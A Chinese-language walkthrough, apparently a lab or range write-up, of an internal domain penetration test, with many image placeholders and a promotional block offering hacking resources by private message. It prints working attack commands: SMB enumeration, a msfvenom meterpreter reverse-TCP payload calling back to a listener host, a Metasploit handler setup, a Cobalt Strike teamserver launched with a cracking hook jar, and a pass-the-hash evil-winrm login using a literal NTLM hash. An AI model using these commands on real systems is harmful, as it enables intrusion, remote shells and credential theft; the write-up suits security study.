msf战队|渗透实战:内网域渗透( 二 )



文章图片

msf战队|渗透实战:内网域渗透

文章图片

msf战队|渗透实战:内网域渗透

文章图片

msf战队|渗透实战:内网域渗透

文章图片

msf战队|渗透实战:内网域渗透

文章图片

msf战队|渗透实战:内网域渗透

文章图片

msf战队|渗透实战:内网域渗透

文章图片

msf战队|渗透实战:内网域渗透

文章图片

msf战队|渗透实战:内网域渗透

文章图片

msf战队|渗透实战:内网域渗透

文章图片


前言本文记录了一次针对具有二层内网的域环境进行渗透测试的过程 , 文中涉及了内网域渗透的基本方法、思路和技巧 。 交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具 , 最后通过约束委派拿下了域控 。 其间运用了很多小工具 , 文章较长 , 下面开始此次渗透长途之旅 。
网络拓扑如下:

web服务器先来波端口扫描:


直接发现了内网的ip , 这里需要提前说明一点 , 由于靶场搭建的问题 , weblogic只在10.10.20.12这个ip上才能解析 , 所以需要调整下ip设置 , 等做完weblogic后我们在改回192段 。


【一>所有资源关注我 , 私信回复“资料”获取<一】
1、200份很多已经买不到的绝版电子书
2、30G安全大厂内部的视频资料
3、100份src文档
4、常见安全面试题
5、ctf大赛经典题目解析
6、全套工具包
看到了weblogic的版本 , 查找下exp , 顺手先来一波smb信息收集 。
smb信息收集smbmap -H 10.10.20.12
smbclient -N -L //10.10.20.12
enum4linux -a 10.10.20.12

rpcclient -U '' 10.10.20.12
smbclient -U '' -L \\\\10.10.20.12

weblogic漏洞利用知道了weblogic的具体版本 , 可以直接去查询漏洞 , 也可以用工具自动扫描下;

这里直接用CVE的漏洞来打一波;

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.20.4  LPORT=1234 -f psh-cmd > exploit.ps1

# use exploit/multi/handler

# set payload windows/x64/meterpreter/reverse_tcp

# set lhost 10.10.20.4

# set lport 1234

# exploit




迁移下进程 , 开始抓密码;

爆破一波 , 原来是个弱口令;

接下来换成CS更方便;
./teamserver 192.168.223.138  123456

java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar

信息收集一波;

weblogic数据解密在介绍下用注册表抓取hash的方法;

抓取成功后拖回本地;

在本地解密;

这里有了hash之后 , 尝试下不用msf和cs来渗透;
evil-winrm -u administrator -H ccef208c6485269c20db2cad21734fe7 -i 192.168.223.165

get-process -name lsass